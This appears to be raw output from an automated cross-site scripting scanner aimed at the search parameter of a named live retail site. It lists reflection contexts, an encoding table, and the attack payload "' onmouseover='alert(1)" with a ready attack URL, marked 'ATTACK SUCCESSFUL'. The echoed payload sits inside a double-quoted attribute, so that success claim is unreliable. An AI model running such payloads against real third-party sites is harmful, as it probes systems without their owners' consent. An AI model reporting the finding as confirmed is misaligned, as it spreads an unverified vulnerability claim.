https://www.gorillasurplus.com/

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.gorillasurplus.com/search?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input type="text" name="q" id="searchPhrase" class="form-control" placeholder="Search by brand, type or product..." value="(uvw&quot;xyz'yxz&lt;/zxy">

----------------------------------------------------------------------------------
HTML Context: [3]
<span itemprop="name">'(uvw&quot;xyz'yxz&lt;/zxy'</span>
<h1>0 results matching '(uvw&quot;xyz'yxz&lt;/zxy'</h1>
<p>No products found for search '(uvw&quot;xyz'yxz&lt;/zxy'.</p>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [2]
<link rel="canonical" href="https://www.gorillasurplus.com/search?q=(uvw%22xyz%27yxz%3c%2fzxy" />
<meta property="og:url" content="https://www.gorillasurplus.com/search?q=(uvw%22xyz%27yxz%3c%2fzxy" />

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.gorillasurplus.com/search?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input type="text" name="q" class="search" value="' onmouseover='alert(1)" placeholder="I'm looking for..." id="searchPhrase">
<input type="text" name="q" class="search" value="' onmouseover='alert(1)" placeholder="I'm looking for..." id="searchPhrase">
<input type="text" name="q" id="searchPhrase" class="form-control" placeholder="Search by brand, type or product..." value="' onmouseover='alert(1)">
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
